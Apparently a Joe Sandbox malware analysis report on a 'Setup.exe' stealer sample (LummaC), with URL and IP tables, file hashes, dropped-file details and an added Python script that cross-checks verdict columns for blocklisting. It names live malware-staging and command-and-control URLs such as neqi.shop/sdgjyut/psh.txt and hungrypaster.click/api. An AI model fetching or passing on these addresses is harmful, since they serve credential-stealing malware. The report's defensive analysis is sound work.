http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0 | Setup.exe | false |  | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | Hc.com, 0000000B.00000003.2066793875.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044585816.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044510092.00000000044A7000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_ | Setup.exe | false |  | high
https://www.cloudflare.com/learning/access-management/phishing-attack/class=cf-btnstyle=background-c | powershell.exe, 00000012.00000002.2253287573.00000000032EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253980772.0000000004C70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253484959.0000000003337000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253787168.0000000003510000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253287573.000000000324C000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://www.autoitscript.com/autoit3/ | Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.dr | false |  | high
https://aka.ms/winsvr-2022-pshelphZ | powershell.exe, 00000010.00000002.2334301446.000000000593A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2334301446.0000000005957000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0 | Setup.exe | false |  | high
http://x1.c.lencr.org/0 | Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://x1.i.lencr.org/0 | Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | Hc.com, 0000000B.00000003.2044585816.000000000447B000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://www.cloudflare.com/learning/access-management/phish | powershell.exe, 00000012.00000002.2254156807.00000000054F3000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://contoso.com/ | powershell.exe, 00000010.00000002.2338815956.0000000006038000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://nuget.org/nuget.exe | powershell.exe, 00000010.00000002.2338815956.0000000006038000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://www.ssl.com/repository0 | Setup.exe | false |  | high
https://www.cloudflare.com/5xx-error-landinghZ | powershell.exe, 00000012.00000002.2254156807.00000000054F3000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://support.mozilla.org/products/firefoxgro.all | Hc.com, 0000000B.00000003.2090598072.0000000005C67000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000010.00000002.2334301446.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2254156807.0000000005141000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://www.cloudflare.com/5xx-error-landingmanceY | powershell.exe, 00000012.00000002.2253287573.000000000327F000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://nuget.org/NuGet.exe | powershell.exe, 00000010.00000002.2338815956.0000000006038000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://hungrypaster.click:443/api | Hc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.cloudflare.com/learning/access-management/phishing-atX) | powershell.exe, 00000012.00000002.2254156807.00000000054F3000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://hungrypaster.click:443/apitPK | Hc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://neqi.shop/ | Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://contoso.com/Icon | powershell.exe, 00000010.00000002.2338815956.0000000006038000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.autoitscript.com/autoit3/X | Hc.com, 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp, Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Developers.8.dr | false |  | high
http://ocsp.rootca1.amazontrust.com0: | Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | Hc.com, 0000000B.00000003.2066793875.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044585816.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044510092.00000000044A7000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://nsis.sf.net/NSIS_ErrorError | Setup.exe | false |  | high
https://www.ecosia.org/newtab/ | Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | Hc.com, 0000000B.00000003.2090598072.0000000005C67000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://github.com/Pester/Pester | powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://kliptizq.shop:443/int_clp_ldr_sha.txt | Hc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.cloudflare.com/5xx-error-landing | powershell.exe, 00000012.00000002.2254156807.00000000053F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253287573.000000000324C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253165533.00000000030A0000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://kliptizq.shop/(W# | Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.cloudflare.com/5xx-error-landingid=brand_linktarget=_blank | powershell.exe, 00000012.00000002.2253287573.00000000032EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253980772.0000000004C70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253484959.0000000003337000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253787168.0000000003510000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253287573.000000000324C000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://ac.ecosia.org/autocomplete?q= | Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://neqi.shop:443/sdgjyut/psh.txt | Hc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://neqi.shop/BJ | Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://aka.ms/pscore6lBdq | powershell.exe, 00000010.00000002.2334301446.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2254156807.0000000005141000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://hungrypaster.click:443/api3r78r106r115r115r112r115r43r69r106r103r103r102r115r102r111r100r102 | Hc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://neqi.shop/sdgjyut/psh.txto | Hc.com, 0000000B.00000002.2324147573.00000000019D8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crl.microb | powershell.exe, 00000012.00000002.2255979594.0000000007896000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.microsof | Hc.com, 0000000B.00000003.2044510092.00000000044A9000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://neqi.shop/sdgjyut/psh.txtk | Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | Hc.com, 0000000B.00000003.2044585816.000000000447B000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0 | Setup.exe | false |  | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmp | false |  | high
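The two URL tables above are worth reading together rather than trusting one verdict column: the only URL the sandbox marks malicious, https://hungrypaster.click/api (the C2 endpoint pulled from the LummaC configuration), carries an Avira URL Cloud verdict of "safe", while every neqi.shop and kliptizq.shop URL is rated "malware" by Avira yet is not flagged malicious by the sandbox. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses rows in the flattened form shown on this page (URL, source process and dump identifiers, and the true/false flag run together, followed by optional "• engine: verdict" lines and the reputation cell), collapses them per host, and lists hosts where the sandbox flag and the reputation verdict disagree. It assumes the Source field always begins with one of the process names seen in this report (powershell.exe, Hc.com, Setup.exe); the sample input is copied from the rows above.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Process names that begin the "Source" cell in this report (assumption: the
# cell always starts with one of them; extend the tuple for other samples).
PROCESS_NAMES = ("powershell.exe", "Hc.com", "Setup.exe")
_PROC = "|".join(re.escape(p) for p in PROCESS_NAMES)

# A flattened row is "<url><source>?<true|false>", e.g.
#   https://neqi.shop/Hc.com, 0000000B.00000002.2324659198.[...].sdmpfalse
# The lazy <url> group stops at the first process name, so the memory-dump
# identifiers that follow stay inside <source>; rows from the table without a
# Source column (e.g. "https://hungrypaster.click/apitrue") match with no <src>.
ROW = re.compile(rf"^(?P<url>.*?)(?P<src>(?:{_PROC})(?:, .*)?)?(?P<mal>true|false)$")
AV_LINE = re.compile(r"^•\s*(?P<engine>[^:]+):\s*(?P<verdict>.+)$")


def host_of(url: str) -> str:
    """Hostname of a URL; bare domain names (no scheme) are returned unchanged."""
    if "://" not in url:
        return url.lower()
    return (urlparse(url).hostname or url).lower()


def parse_url_table(text: str) -> list:
    """Turn the flattened URL table into one dict per row."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    records, i = [], 0
    while i < len(lines):
        m = ROW.match(lines[i])
        if not m:                      # header line or other noise
            i += 1
            continue
        rec = {"url": m["url"], "host": host_of(m["url"]),
               "source": m["src"] or "", "malicious": m["mal"] == "true",
               "av": {}, "reputation": None}
        i += 1
        # zero or more "• <engine>: <verdict>" lines follow the row
        while i < len(lines) and (av := AV_LINE.match(lines[i])):
            rec["av"][av["engine"].strip()] = av["verdict"].strip().lower()
            i += 1
        # then the reputation cell, unless the next row starts immediately
        if i < len(lines) and not ROW.match(lines[i]) and not AV_LINE.match(lines[i]):
            rec["reputation"] = lines[i]
            i += 1
        records.append(rec)
    return records


def summarize(records) -> dict:
    """Collapse rows to one entry per host: sandbox flag, AV verdicts, processes."""
    hosts = defaultdict(lambda: {"malicious": False, "verdicts": set(), "processes": set()})
    for r in records:
        h = hosts[r["host"]]
        h["malicious"] = h["malicious"] or r["malicious"]
        h["verdicts"] |= set(r["av"].values())
        if r["source"]:
            h["processes"].add(r["source"].split(",")[0].strip())
    return dict(hosts)


def verdict_disagreements(hosts: dict):
    """Hosts where the sandbox flag and the URL-reputation verdict point different ways."""
    flagged_but_av_safe = {h for h, v in hosts.items()
                           if v["malicious"] and "safe" in v["verdicts"]}
    av_malware_not_flagged = {h for h, v in hosts.items()
                              if not v["malicious"] and "malware" in v["verdicts"]}
    return flagged_but_av_safe, av_malware_not_flagged


# Sample input: rows copied from the report's URL tables in their flattened form.
REPORT_ROWS = """\
https://neqi.shop/sdgjyut/psh.txtfalse
• Avira URL Cloud: malware
unknown
https://hungrypaster.click/apitrue
• Avira URL Cloud: safe
unknown
https://www.cloudflare.com/learning/access-management/phishing-attack/powershell.exe, 00000012.00000002.2254156807.00000000053F6000.00000004.00000800.00020000.00000000.sdmpfalse
high
http://ocsps.ssl.com0Setup.exefalse
high
https://www.autoitscript.com/autoit3/Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drfalse
high
https://hungrypaster.click:443/apiHc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmpfalse
• Avira URL Cloud: safe
unknown
https://kliptizq.shop:443/int_clp_ldr_sha.txtHc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmpfalse
• Avira URL Cloud: malware
unknown
https://neqi.shop/sdgjyut/psh.txtoHc.com, 0000000B.00000002.2324147573.00000000019D8000.00000004.00000020.00020000.00000000.sdmpfalse
• Avira URL Cloud: malware
unknown
http://crl.microbpowershell.exe, 00000012.00000002.2255979594.0000000007896000.00000004.00000020.00020000.00000000.sdmpfalse
• Avira URL Cloud: safe
unknown
"""

if __name__ == "__main__":
    flagged, unflagged = verdict_disagreements(summarize(parse_url_table(REPORT_ROWS)))
    print("sandbox-malicious but rated safe:", sorted(flagged))
    print("rated malware but not flagged:   ", sorted(unflagged))
```

Run against the full table, the script yields hungrypaster.click in the first set and neqi.shop and kliptizq.shop in the second; all three are the Cloudflare-fronted hosts in the IP table that follows, so a blocklist built from either verdict column alone would miss part of the infrastructure.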
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.6 | hungrypaster.click | European Union | 13335 | CLOUDFLARENETUS | true
104.21.84.113 | kliptizq.shop | United States | 13335 | CLOUDFLARENETUS | false
172.67.169.205 | neqi.shop | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580131
Start date and time: 2024-12-24 01:32:28 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 25s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Setup.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@30/31@4/3
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 70
• Number of non-executed functions: 311
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.61
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsps.ssl.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 2836 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7312 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
No simulations
                                                                                                                                                    • 104.21.84.113
                                                                                                                                                    • 172.67.169.205
                                                                                                                                                    xlSzrIs5h6.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                    • 188.114.97.6
                                                                                                                                                    • 104.21.84.113
                                                                                                                                                    • 172.67.169.205
                                                                                                                                                    ZysXVT72cl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 188.114.97.6
                                                                                                                                                    • 104.21.84.113
                                                                                                                                                    • 172.67.169.205
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\280366\Hc.com | fkawMJ7FH8.exe | malicious | LummaC, Amadey, LummaC Stealer, RedLine, Stealc
 | ChoForgot.exe | malicious | Vidar
 | 94e.exe | malicious | Remcos
 | 94e.exe | malicious | Remcos
 | 0442.pdf.exe | malicious | Remcos
 | acronis recovery expert deluxe 1.0.0.132.rarl.exe | malicious | LummaC
 | trZG6pItZj.exe | malicious | Vidar
 | 9EI7wrGs4K.exe | malicious | Vidar
 | Wine.exe | malicious | LummaC

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):0.34726597513537405
Encrypted:false
SSDEEP:3:Nlll:Nll
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:false

Process:C:\Windows\SysWOW64\cmd.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):947288
Entropy (8bit):6.630612696399572
Encrypted:false
SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:62D09F076E6E0240548C2F837536A46A
SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: fkawMJ7FH8.exe, Detection: malicious
• Filename: ChoForgot.exe, Detection: malicious
• Filename: 94e.exe, Detection: malicious
• Filename: 94e.exe, Detection: malicious
• Filename: 0442.pdf.exe, Detection: malicious
• Filename: acronis recovery expert deluxe 1.0.0.132.rarl.exe, Detection: malicious
• Filename: trZG6pItZj.exe, Detection: malicious
• Filename: 9EI7wrGs4K.exe, Detection: malicious
• Filename: Wine.exe, Detection: malicious

Process:C:\Windows\SysWOW64\cmd.exe
File Type:data
Category:dropped
Size (bytes):466124
Entropy (8bit):7.999604773482189
Encrypted:true
SSDEEP:12288:yEBA5qYZFNNFg5y6qh8DLJv836EzIqP6Ft+t2k1epDSp:xA5qcNDg5yh8PtW6FVFt+pgC
MD5:3224476071285CA2C85876002120182B
SHA1:F6EC731B44C016BC642EAA5B8AFF12D798417500
SHA-256:523A25C70126A9947C491587282827B07352DAFBDE21197727E7B22787F51E8E
SHA-512:DE960E7097CBC92D9C175B646206D96C722F9104B30FB333128F48EDCFA4B2D474C1F1632F15031EAEEFFF61FF5480B40F4C0E53804835FA8D7538BDFA09AD16
Malicious:false

Process:C:\Windows\SysWOW64\extrac32.exe
File Type:DOS executable (COM)
Category:dropped
Size (bytes):52224
Entropy (8bit):6.616637261148489
Encrypted:false
SSDEEP:768:WY6rbybcdAqM4w85qviR93X0Z1IrvD19c1pQLiype/ehju5rWiq/DOSOlwRDNFo1:WY464qvI932eOypvcLSDOSpZ+Sh+IU
MD5:73240421468DABA3E1CACD56A08D2CF9
SHA1:D22B0E5DA0EE5CE4F19B41228016DB890A3F0CD4
SHA-256:5AE5202682B0F5F6C87E9E28858E1E9BE2F7032582BF28BD720517BA0D7E4FBB
SHA-512:140100D41B41DDD1574114A264BF4858BC408E0C79D24AA1001BCB9F86B392A35B1773215B9E6CC6665F37D16F866E8A996C470A2611EB7D5C969BC301C3242C
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\Desktop\Setup.exe
File Type:Microsoft Cabinet archive data, 489682 bytes, 12 files, at 0x2c +A "Cash" +A "Jury", ID 6845, number 1, 29 datablocks, 0x1 compression
Category:dropped
Size (bytes):489682
Entropy (8bit):7.998526384976645
Encrypted:true
SSDEEP:12288:wpgLBZWuuPSjx8pv6yufclVtaCbOhYtzYjX9cbgeZ0X:cgkPSV8pyHWEytUjNcbgtX
MD5:3B891BAB1F59CA7A8F70A02506C5BE5E
SHA1:4FE8FD4136129A410F8A97B0415D7BCA29EF77E9
SHA-256:E95567B78827D3B731C7BD183741E044EE91A81FB58907CD5257B0F4668C0660
SHA-512:0831DCED5A288153166C4A0314B7B24C408336DE9BF741BCCB711D1A71996951DD395E5B91EB3FDB1423C3CA94DB28EEAE3DD486FDCEF40983E4231DAB3B06B5
Malicious:false

Process:C:\Users\user\Desktop\Setup.exe
File Type:OpenPGP Public Key
Category:dropped
Size (bytes):62464
Entropy (8bit):7.997103321874569
Encrypted:true
SSDEEP:1536:A0cvC95Od7r1Muwg//k0reABy6Bz8ejwS8s:A0z95OdPkg//kIrBy6B8eP8s
MD5:CE133FEEA90EBC7648B2A1826CDF76A2
SHA1:31BD289BDB6F118507B41B8E69AAECF4A1163773
SHA-256:E1819706091BFBF96DBB9BC5DB4F66CFD0A56BEF7F0B6438531C3D9C4ADC3119
SHA-512:E4BF39FBAD9A5902D2F024E35B8ABDD4CC6714ACE244A594BEE41465436FB2B8B22C1FAF7375BE7DC986BEA22AC4A77B78652EF7D4F633B0DB98B6E3D521BF92
Malicious:false

Process:C:\Windows\SysWOW64\extrac32.exe
File Type:data
Category:dropped
Size (bytes):149504
Entropy (8bit):6.695940442997366
Encrypted:false
SSDEEP:3072:/lHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESb:NHS3zcNPj0nEo3tb2j6AUkB0CThp6b
MD5:AED1C869CC9610344E24FBD8050AC4D4
SHA1:A23CE35D2CB399F75B091959A4E449F655EBE142
SHA-256:91906E3A443DF990F4FA6693887DB5017A03E7487997B2CC95EE21757E8E9CB1
SHA-512:7F2721FAC7B773C9BC51DAAB0D2209E4E53C04DC42A4058D214A78E03572E7CBB3700A6D01CEFF20859CDE06252454F1F8729B7940F5314204029E182E472237
Malicious:false
                                                                                                                                                                      Preview:.............@.....>.t...........Q.s...C..............E..F........N.....s....3.RP.W......V..F.........C....t....t....AK......V...t......R...v..6RP........V..[....C......M....t..J.j..U.../...m...../...R..^......!....+........@.......;.t...............Q.r...F.............:...........g.......{E..$..zE.......wZ.$..{E..C.....IM....t..J.j..U..h....m.........R.T^...........+........@.......;.t.......................G..p........v.....{........S...BP.......V.E...P....;.t.P....I...M..H......................R.......`....R..X........G..p...l....v..d....O..q.........Q.H...w.........6q..P.Kn.....D......T..........[..........G..p.......v........P....E....P..;...........;E......................;...C........K....t#.J.j..U...,...m.....U..........x...R.\...U.......+.U..`......@..U..S....;.t....U..D......U..:...H...wr.$.0{E..F..........+K....t(.J.j..U..J,...m....E...................R.&\........................@......>.t................G..p....
                                                                                                                                                                      Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):86016
                                                                                                                                                                      Entropy (8bit):7.997914543444093
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:grfjVQJTaqw1U6D6ZJoYliEvfstVc5/88wb0320DNStFeRBkj:Gj+Lw1X6ZqY/vfstVu/Ipe2
                                                                                                                                                                      MD5:2A80ED063A2EC6F7FBDBAA0C8806BEE5
                                                                                                                                                                      SHA1:7235E6A68488D9583FFB7BFEFD146FD4B47E074E
                                                                                                                                                                      SHA-256:EF6F02A7FBA84C6FD4C7F3AA77141B4EBE36D7A0B89AA89B82E3689D3C4342D7
                                                                                                                                                                      SHA-512:F3D245B534ACC86C0F13CF8C8A88AAA45CCD72EB959A9B710690F3F851327DF10A1F4045618886F10D8014BDF4B7E03EA5788A3F29EA237A35BDCE49AEE1F862
                                                                                                                                                                      Malicious:false
